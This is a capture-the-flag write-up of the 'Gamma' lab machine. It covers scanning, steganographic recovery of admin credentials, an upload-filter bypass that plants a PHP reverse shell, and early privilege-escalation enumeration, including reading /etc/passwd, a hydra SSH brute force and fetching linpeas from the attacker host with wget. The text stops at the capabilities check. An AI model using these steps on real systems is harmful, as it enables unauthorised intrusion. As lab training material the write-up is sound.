# Gamma CTF ## Table of Contents: 1. Scanning * TCP Scan * UDP Scan 2. Port 80 * Directory Brute-Forcing (Gobuster) * Web server Vulnerability Scanning (Nikto) * Source Code Inspection * Steganography * Admin Login * Exploiting File Upload * Initial Foothold (www-data) 3. Privilege Escalation * Linpeas * Manual Privilege Escalation Techniques * Kernel Exploit * Root Flag 4. Other Attack Vectors * Trying other Privilege Escalation Exploits * Nessus Scan * Exploring Other Ports 5. Remediations and Recommendations for Machine Owner 6. References ## 1- Scanning ### TCP ``` nmap -sS -sV -p- 192.168.229.158 ``` #### Results ``` ┌──(kali㉿kali)-[~] └─$ nmap -sS -sV -p- 192.168.229.158 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 13:41 EET Nmap scan report for 192.168.229.158 Host is up (0.00066s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 5355/tcp open llmnr? MAC Address: 00:0C:29:78:F8:7B (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 132.41 seconds ``` #### Ports Open: ``` 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 5355/tcp open llmnr? ``` #### Aggressive Scan on Open Ports ``` sudo nmap -sT -A -p22,53,80,5355 192.168.229.158 ``` Results: ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 98:b7:f5:6b:0d:58:1d:7b:58:7d:1a:99:fb:b1:8f:04 (RSA) | 256 66:b4:4b:40:e6:c9:76:93:31:aa:fc:ff:9a:40:a9:f9 (ECDSA) |_ 256 55:c6:b2:01:0f:16:1c:68:96:e2:bb:b1:fe:ff:59:c2 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: School of Engineering 5355/tcp open llmnr? MAC Address: 00:0C:29:78:F8:7B (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.10 (99%), Linux 3.2 - 4.9 (97%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.10 - 4.11 (94%), Linux 4.4 (94%), Linux 3.13 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (94%), Linux 3.2 - 3.16 (94%), Linux 3.1 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### UDP ``` nmap -sU 192.168.229.158 ``` Results: ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 04:03 EET Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 2.60% done; ETC: 04:10 (0:06:52 remaining) Stats: 0:03:15 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 20.68% done; ETC: 04:19 (0:12:28 remaining) Stats: 0:16:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 99.20% done; ETC: 04:20 (0:00:08 remaining) Nmap scan report for 192.168.229.158 Host is up (0.00072s latency). Not shown: 997 closed udp ports (port-unreach) PORT STATE SERVICE 53/udp open domain 68/udp open|filtered dhcpc 5355/udp open|filtered llmnr MAC Address: 00:0C:29:78:F8:7B (VMware) Nmap done: 1 IP address (1 host up) scanned in 1019.81 seconds ``` ### Vulnerability Scanning ``` nmap --script vuln -p 22,53,80,5355 192.168.229.158 ``` Results: ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 03:48 EET Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.229.158 Host is up (0.00073s latency). PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http | http-fileupload-exploiter: | | Couldn't find a file-type field. | |_ Couldn't find a file-type field. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-internal-ip-disclosure: |_ Internal IP Leaked: 127.0.1.1 |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /administrator/: Possible admin folder | /administrator/index.php: Possible admin folder | /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' |_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' 5355/tcp open llmnr MAC Address: 00:0C:29:78:F8:7B (VMware) Nmap done: 1 IP address (1 host up) scanned in 64.43 seconds ``` ## 2- Port 80 ### Gobuster ``` gobuster dir -u http://192.168.229.158 -w /usr/share/wordlists/dirb/common.txt ``` #### Results: ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.229.158 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 280] /.hta (Status: 403) [Size: 280] /.htpasswd (Status: 403) [Size: 280] /administrator (Status: 301) [Size: 326] [--> http://192.168.229.158/administrator/] /css (Status: 301) [Size: 316] [--> http://192.168.229.158/css/] /fonts (Status: 301) [Size: 318] [--> http://192.168.229.158/fonts/] /images (Status: 301) [Size: 319] [--> http://192.168.229.158/images/] /index.html (Status: 200) [Size: 32410] /js (Status: 301) [Size: 315] [--> http://192.168.229.158/js/] /server-status (Status: 403) [Size: 280] /vendor (Status: 301) [Size: 319] [--> http://192.168.229.158/vendor/] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== ``` #### Important Directories: ``` /administrator /images /vendor ``` ### Nikto ``` nikto -h http://192.168.229.158 ``` Results: ``` - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.229.158 + Target Hostname: 192.168.229.158 + Target Port: 80 + Start Time: 2024-11-26 13:46:30 (GMT2) --------------------------------------------------------------------------- + Server: Apache/2.4.29 (Ubuntu) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed + /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649 + /: Server may leak inodes via ETags, header found with file /, inode: 7e9a, size: 627c629320964, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD . + /administrator/: This might be interesting. + /css/: Directory indexing found. + /css/: This might be interesting. + /images/: Directory indexing found. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + /administrator/index.php: Admin login page/section found. + 8102 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2024-11-26 13:46:47 (GMT2) (17 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` ### Firefox Now, lets open the website on firefox: Lets visit "" #### Source code: Source code for "" After deeply inspecting the source code, nothing seems suspicious. #### /administrator Now, lets check the source code for this directory, which appeared in 'nikto' and in 'gobuster': **Login Page:**
**Source Code:**
There is an important comment in the source code, which is: " Find the image hidden around, Do you know steganography in images bud? " #### /images Lets now move onto the /images directory, since steganography is likely present as mentioned in the hint above.
Flag.txt found! Lets read its content. **Flag.txt:** "Almost there! Odin is the god of wisdom. He bestoys "hidden" knowledge that only the initiate can know. Did you notice something hidden in its image? Dr. Hussein Bakri " Hint: There is something hidden in odin's image. In this directory also, we can see that there is a png file named OdinHiddenKnowledge.png. Lets check it out:
### Steganography Lets now download this image to out attacker machine, in order to do some steganography, and find what is hidden inside it.
#### exiftool ``` exiftool OdinHiddenKnowledge.png ``` ``` ExifTool Version Number : 13.00 File Name : OdinHiddenKnowledge.png Directory : . File Size : 689 kB File Modification Date/Time : 2024:11:26 14:03:40+02:00 File Access Date/Time : 2024:11:26 14:03:40+02:00 File Inode Change Date/Time : 2024:11:26 14:03:40+02:00 File Permissions : -rw-rw-r-- File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 759 Image Height : 890 Bit Depth : 8 Color Type : RGB with Alpha Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced Image Size : 759x890 Megapixels : 0.676 ``` #### strings ``` strings OdinHiddenKnowledge.png ``` nothing seems suspicious #### steghide ``` steghide extract -sf OdinHiddenKnowledge.png ``` ``` Enter passphrase: steghide: the file format of the file "OdinHiddenKnowledge.png" is not supported. ``` #### binwalk ``` binwalk OdinHiddenKnowledge.png ``` ``` DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 759 x 890, 8-bit/color RGBA, non-interlaced 41 0x29 Zlib compressed data, compressed 18017 0x4661 JBOOT STAG header, image id: 8, timestamp 0xD51B2DC9, image size: 4129282426 bytes, image JBOOT checksum: 0x7BB1, header JBOOT checksum: 0xADFD ``` Important things found here: * A PNG starting at 0x0. * ZLib compressed data at 0x29. * A suspicious header at 0x4661. Lets now extract them: ``` binwalk -e OdinHiddenKnowledge.png ``` Result: ``` DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 41 0x29 Zlib compressed data, compressed WARNING: One or more files failed to extract: either no utility was found or it's unimplemented ``` Lets check this directory: `OdinHiddenKnowledge.png.extracted_` ``` ls -la _OdinHiddenKnowledge.png.extracted ``` ``` total 684 drwxrwxr-x 2 kali kali 4096 Nov 26 15:03 . drwxrwxr-x 3 kali kali 4096 Nov 26 15:03 .. -rw-rw-r-- 1 kali kali 0 Nov 26 15:03 29 -rw-rw-r-- 1 kali kali 689084 Nov 26 15:03 29.zlib ``` Results: * There is an empty file `29`. * There is a zip file `29.zlib`. Lets check the contents of `29.zlib`: ``` file 29.zlib ``` result: ``` 29.zlib: zlib compressed data ``` Lets decompress this zip: Nothing important. #### zsteg ``` zsteg -a OdinHiddenKnowledge.png ``` Results: ``` b1,rgb,lsb,xy .. text: "godofhacking is HusseinBakri. This incantation allows you access for sure." b2,r,msb,xy .. text: "}UWUUUUUUUUTUUUQ" b2,g,msb,xy .. text: "WUUUUUUUUTUUUQ" b2,b,msb,xy .. text: "]_WUUUUUUUUTUUUQ" b2,rgb,msb,xy .. text: "UUUUUUUUUUUUUUUUUUUUUUUUUU@UUUUUUUUUUU" b2,bgr,msb,xy .. text: "UUUUUUUUUUUUUUUUUUUUUUUUUU@UUUUUUUUUUU" b2,abgr,msb,xy .. text: ["W" repeated 35 times] b3,b,msb,xy .. file: MPEG ADTS, layer I, v2, 96 kbps, Monaural b3,abgr,msb,xy .. file: MPEG ADTS, layer I, v2, 96 kbps, Monaural b3p,r,msb,xy .. text: "[{[[[[[[[[[[[K[[[[[YK" b3p,g,msb,xy .. text: "[[[[[[[[[[[K[[[[[YK" b3p,b,msb,xy .. text: "{[[[[[[[[[[[K[[[[[YK" b3p,rgb,msb,xy .. text: "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[\t[[[[[[[[[[[[[[[[\t[[[\tR\t" b3p,bgr,msb,xy .. text: "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[\t[[[[[[[[[[[[[[[[\t[[[\tR\t" b3p,abgr,msb,xy .. text: ["_" repeated 35 times] b4,r,msb,xy .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw" b4,g,msb,xy .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw" b4,b,lsb,xy .. file: AIX core file 64-bit b4,b,msb,xy .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw" b4,bgr,msb,xy .. file: MPEG ADTS, layer I, v2, 112 kbps, 24 kHz, Monaural b5,g,msb,xy .. file: MPEG ADTS, layer II, v1, Monaural b5,b,lsb,xy .. file: MPEG ADTS, layer II, v1, 384 kbps, Monaural b5,bgr,lsb,xy .. file: MPEG ADTS, layer II, v1, JntStereo b5p,r,msb,xy .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'" b5p,g,msb,xy .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'" b5p,b,lsb,xy .. file: MPEG ADTS, layer I, v2, Monaural b5p,b,msb,xy .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'" b5p,rgb,msb,xy .. text: "ooooooooooooooooooooooooooooooooooo'oooooooooooooooo'ooo'K'" b5p,bgr,msb,xy .. text: "ooooooooooooooooooooooooooooooooooo'oooooooooooooooo'ooo'K'" b5p,abgr,msb,xy .. file: ddis/ddif b6,g,msb,xy .. file: MPEG ADTS, layer I, v2, Monaural b6,abgr,msb,xy .. file: ddis/ddif b6p,r,msb,xy .. text: "_________________O_______" b6p,g,msb,xy .. text: "_________________O_______" b6p,b,lsb,xy .. file: , Monaural b6p,b,msb,xy .. text: "_________________O_______" b6p,rgb,msb,xy .. text: ["_" repeated 35 times] b6p,abgr,msb,xy .. file: ddis/ddif b7,r,lsb,xy .. file: AIX core file fulldump 32-bit b7,g,lsb,xy .. file: , Monaural b7,rgb,lsb,xy .. file: AIX core file fulldump 32-bit b7p,r,msb,xy .. text: ["?" repeated 17 times] b7p,g,msb,xy .. text: ["?" repeated 17 times] b7p,b,lsb,xy .. file: MPEG ADTS, layer II, v1, Monaural b7p,b,msb,xy .. text: ["?" repeated 17 times] b7p,rgb,msb,xy .. text: ["?" repeated 35 times] b7p,bgr,msb,xy .. text: ["?" repeated 35 times] b7p,abgr,msb,xy .. file: ddis/ddif b8,r,msb,xy .. file: RDI Acoustic Doppler Current Profiler (ADCP) b8,bgr,msb,xy .. file: ddis/ddif b1,bgr,lsb,xy,prime .. /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s': stack level too deep (SystemStackError) from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect' from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s' from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect' from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s' from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect' from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s' from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect' from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s' ... 10066 levels... from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg.rb:26:in `run' from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/bin/zsteg:8:in `' from /usr/local/bin/zsteg:25:in `load' from /usr/local/bin/zsteg:25:in `
' ``` There is an EXTREMELY important hint: Hint: "godofhacking is HusseinBakri. This incantation allows you access for sure" Lets try those as credentials in the /administrator. username: `godofhacking` password: `HusseinBakri` And........ we are in!
### File Upload Lets try now to upload a php reverse shell. Note: We still need to know where those uploads go to. From pentest monkey, I downloaded a reverse shell, and modified the port and the ip. Now, lets try to upload the reverse shell.
When I pressed on submit, it redirected me to this page:
So, I wasn't able to upload. Lets see what is the cause of this problem. Lets try to rename my file from `pentest_monkey_php_reverse_shell.php` to `pentest_monkey_php_reverse_shell.php.jpg`, and try to re-upload.
Still, not working. Lets try renaming it to .phtml and .php3 and .png. * phtml didn't work. * php3 didn't work also. * png also didn't work. Before I move onto burp suite, for one last time, I am going to upload a true png file, and a true jpg file, to confirm that uploading isn't working. ... and yes, both also didn't work. Lets try our luck and SSH into the machine using those credentials: username: `godofhacking` password: `HusseinBakri` ``` ┌──(kali㉿kali)-[~/gamma_project] └─$ ssh godofhacking@192.168.229.158 godofhacking@192.168.229.158's password: Permission denied, please try again. ``` Didn't work. Before we move on, this seems suspicious: `ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1` It is found here in the source code:
And, when I upload a file, it takes me to "" This looks like a hash. Lets visit this website "", and decrypt it to see if it contains something useful. Output: \`ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1:upload Nice. So this hash is `upload`. I will try to append `upload` to the url, and try to reupload. The resulting url: `http://192.168.229.158/administrator/husseinbakri.php/upload` Lets try to re-upload the reverse shell file:
The site says: `The image format must be jpg,jpeg,gif,png` Lets change the extension to .jpg.php: ``` mv reverse_monkey_shell.php reverse_monkey_shell.jpg.php ```
Upload Success (Top left). What we have to do now is trigger a reverse shell. Before that, I noticed that everything works after `/administrator`, what I mean by this, is if I write `http://192.168.229.158/administrator/husseinbakri.php/test` for example, I can upload a file, and it works. So, now, lets trigger this reverse shell: I tried entering `http://192.168.229.158/administrator/husseinbakri.php/reverse_shell.jpg.php`, but didn't work. I then searched in all the directories that were previously found, such as images, vendor..., but also the reverse shell wasn't there. However, I noticed something important. When I was uploading in `http://192.168.229.158/administrator/husseinbakri.php/`, it was taking me to this url: "" So, what I did now, is I edited the url, and renamed it to "". and boom! It worked!
In the meantime, a netcat session was opened with: ``` nc -lvnp 1234 ```
Now, lets upgrade the connection using: ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ``` ## 3- Privilege Escalation ### Enumerating www-data Lets do some enumeration, since now we have our initial foothold on the machine: ``` www-data@gamma:/$ whoami whoami www-data www-data@gamma:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@gamma:/$ ``` Kernel: ``` www-data@gamma:/$ uname -a uname -a Linux gamma 4.10.0-19-generic #21-Ubuntu SMP Thu Apr 6 17:04:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux ``` Files: ``` www-data@gamma:/$ ls -la ls -la total 483912 drwxr-xr-x 23 root root 4096 Nov 25 23:03 . drwxr-xr-x 23 root root 4096 Nov 25 23:03 .. -rw------- 1 root root 31 Nov 25 23:03 .bash_history drwxr-xr-x 2 root root 4096 Sep 16 2020 bin drwxr-xr-x 3 root root 4096 Sep 16 2020 boot drwxr-xr-x 18 root root 3760 Dec 2 20:21 dev drwxr-xr-x 100 root root 4096 Nov 25 21:18 etc drwxr-xr-x 3 root root 4096 Sep 16 2020 home lrwxrwxrwx 1 root root 33 Sep 16 2020 initrd.img -> boot/initrd.img-4.10.0-19-generic drwxr-xr-x 23 root root 4096 Sep 16 2020 lib drwxr-xr-x 2 root root 4096 Sep 16 2020 lib64 drwx------ 2 root root 16384 Sep 16 2020 lost+found drwxr-xr-x 3 root root 4096 Sep 16 2020 media drwxr-xr-x 2 root root 4096 Apr 12 2017 mnt drwxr-xr-x 2 root root 4096 Apr 12 2017 opt dr-xr-xr-x 210 root root 0 Dec 2 20:21 proc drwx------ 4 root root 4096 Nov 25 23:09 root drwxr-xr-x 25 root root 900 Dec 2 20:21 run drwxr-xr-x 2 root root 12288 Sep 16 2020 sbin drwxr-xr-x 2 root root 4096 Apr 6 2017 snap drwxr-xr-x 2 root root 4096 Apr 12 2017 srv -rw------- 1 root root 495416320 Sep 16 2020 swapfile dr-xr-xr-x 13 root root 0 Dec 2 20:21 sys drwxrwxrwt 3 root root 4096 Dec 2 20:24 tmp drwxr-xr-x 10 root root 4096 Sep 16 2020 usr drwxr-xr-x 14 root root 4096 Sep 16 2020 var lrwxrwxrwx 1 root root 30 Sep 16 2020 vmlinuz -> boot/vmlinuz-4.10.0-19-generic ``` Lets check usernames on the system: ``` www-data@gamma:/$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:109::/var/run/dbus:/bin/false lxd:x:107:65534::/var/lib/lxd/:/bin/false uuidd:x:108:113::/run/uuidd:/bin/false postgres:x:109:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false bind:x:111:117::/var/cache/bind:/bin/false sshd:x:112:65534::/run/sshd:/usr/sbin/nologin pollinate:x:113:1::/var/cache/pollinate:/bin/false exploiter:x:1000:1000:exploiter,,,:/home/exploiter:/bin/bash apache2:x:1001:1001:,,,:/var/www:/bin/bash ``` Username found: `exploiter` ### SSH Bruteforce Since we found a username named `exploiter`, lets try to bruteforce into ssh. ``` hydra -t 64 -l exploiter -P /usr/share/wordlists/rockyou.txt ssh://192.168.229.158 ``` Result: ``` Hydra v9.6dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-03 00:49:02 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task [DATA] attacking ssh://192.168.229.158:22/ [STATUS] 619.00 tries/min, 619 tries in 00:01h, 14343832 to do in 386:13h, 12 active [STATUS] 396.33 tries/min, 1189 tries in 00:03h, 14343263 to do in 603:10h, 11 active [STATUS] 326.57 tries/min, 2286 tries in 00:07h, 14342166 to do in 731:58h, 11 active ``` Nothing found in the first 2286 tries... ### Linpeas Now, i will upload linpeas from my host machine to the vulnerable machine. On my host machine (In the directory that contains linpeas.sh): ``` python3 -m http.server 8080 ``` On the target machine, lets go to the /tmp directory and download linpeas.sh: ``` cd /tmp www-data@gamma:/tmp$ ls ls www-data@gamma:/tmp$ ls -la ls -la total 8 drwxrwxrwt 2 root root 4096 Dec 2 20:21 . drwxr-xr-x 23 root root 4096 Nov 25 23:03 .. www-data@gamma:/tmp$ wget http://192.168.229.150:8080/linpeas.sh wget http://192.168.229.150:8080/linpeas.sh --2024-12-02 20:24:21-- http://192.168.229.150:8080/linpeas.sh Connecting to 192.168.229.150:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 823059 (804K) [text/x-sh] Saving to: 'linpeas.sh' linpeas.sh 100%[===================>] 803.77K --.-KB/s in 0.006s 2024-12-02 20:24:21 (135 MB/s) - 'linpeas.sh' saved [823059/823059] www-data@gamma:/tmp$ ls ls linpeas.sh ``` Making the script executable: ``` chmod +x linpeas.sh ``` Running linpeas: ``` ./linpeas.sh ```
Important things found from linpeas.sh" * The `sudo` version (`1.8.19p1`) on the system may be vulnerable to the "Baron Samedit" exploit. * Exploit CVE-2021-4034 ("PwnKit"); This is a known privesc vulnerability in `pkexec` (part of `Polkit`). The system appears vulnerable to it. * The `/usr/share/openssh/sshd_config` file is world-readable. * The `/tmp` folder is writable, and LinPEAS has identified writable files owned by `www-data` and others in `/tmp` and `/var/tmp`. * Several cron jobs are running, and `/etc/cron.daily`, `/etc/cron.weekly`, and similar directories are populated. * Several SUID binaries (`/usr/bin/pkexec`, `/usr/lib/snapd/snap-confine`) are present. * A `.bash_history` file is available for the `apache2` user. ### Exploit db 3 exploits found for our ubuntu version:
### Manual Privilege Escalation #### SUID ``` find / -type f -perm -04000 -ls 2>/dev/null ``` Result: ``` www-data@gamma:/$ find / -type f -perm -04000 -ls 2>/dev/null find / -type f -perm -04000 -ls 2>/dev/null 149353 40 -rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 402109 76 -rwsr-xr-x 1 root root 76168 Apr 6 2017 /usr/lib/snapd/snap-confine 149529 16 -rwsr-xr-x 1 root root 14328 Oct 21 2016 /usr/lib/policykit-1/polkit-agent-helper-1 148761 432 -rwsr-xr-x 1 root root 440728 Mar 30 2017 /usr/lib/openssh/ssh-keysign 131590 44 -rwsr-xr-- 1 root messagebus 42992 Oct 11 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 131600 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 131393 56 -rwsr-xr-x 1 root root 54256 Sep 20 2016 /usr/bin/passwd 148991 52 -rwsr-sr-x 1 daemon daemon 51464 Dec 22 2016 /usr/bin/at 149475 36 -rwsr-xr-x 1 root root 32944 Sep 20 2016 /usr/bin/newgidmap 131382 40 -rwsr-xr-x 1 root root 39904 Sep 20 2016 /usr/bin/newgrp 149476 36 -rwsr-xr-x 1 root root 32944 Sep 20 2016 /usr/bin/newuidmap 149526 24 -rwsr-xr-x 1 root root 22520 Oct 21 2016 /usr/bin/pkexec 131479 140 -rwsr-xr-x 1 root root 140944 Jan 13 2017 /usr/bin/sudo 131228 72 -rwsr-xr-x 1 root root 71824 Sep 20 2016 /usr/bin/chfn 131300 76 -rwsr-xr-x 1 root root 75304 Sep 20 2016 /usr/bin/gpasswd 131230 40 -rwsr-xr-x 1 root root 40432 Sep 20 2016 /usr/bin/chsh 148699 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils 532095 8 -rwsr-xr-x 1 www-data www-data 5096 Dec 2 21:56 /tmp/..a 526038 8 -rwsr-xr-x 1 www-data www-data 5096 Dec 2 21:56 /tmp/a 528794 8 -rwsr-xr-x 1 www-data www-data 5096 Dec 2 21:56 /tmp/.a 262218 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping 278115 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount 262255 32 -rwsr-xr-x 1 root root 30792 Nov 16 2016 /bin/umount 277305 144 -rwsr-xr-x 1 root root 146128 Feb 1 2017 /bin/ntfs-3g 262205 40 -rwsr-xr-x 1 root root 38984 Nov 16 2016 /bin/mount 262236 40 -rwsr-xr-x 1 root root 40128 Sep 20 2016 /bin/su ``` I searched for each one on GTFOBins, but nothing useful was found. #### Sudo Lets check which commands can be run with sudo without password: ``` www-data@gamma:/$ sudo -l [sudo] password for www-data: ``` We dont have the password of www-data, so this doesnt work. #### Capabilities ``` www-data@gamma:/$ getcap -r / 2>/dev/null /usr/bin/mtr = cap_net_raw+ep www-data@gamma:/$ ``` Lets go to GTFOBins and check if this is found.
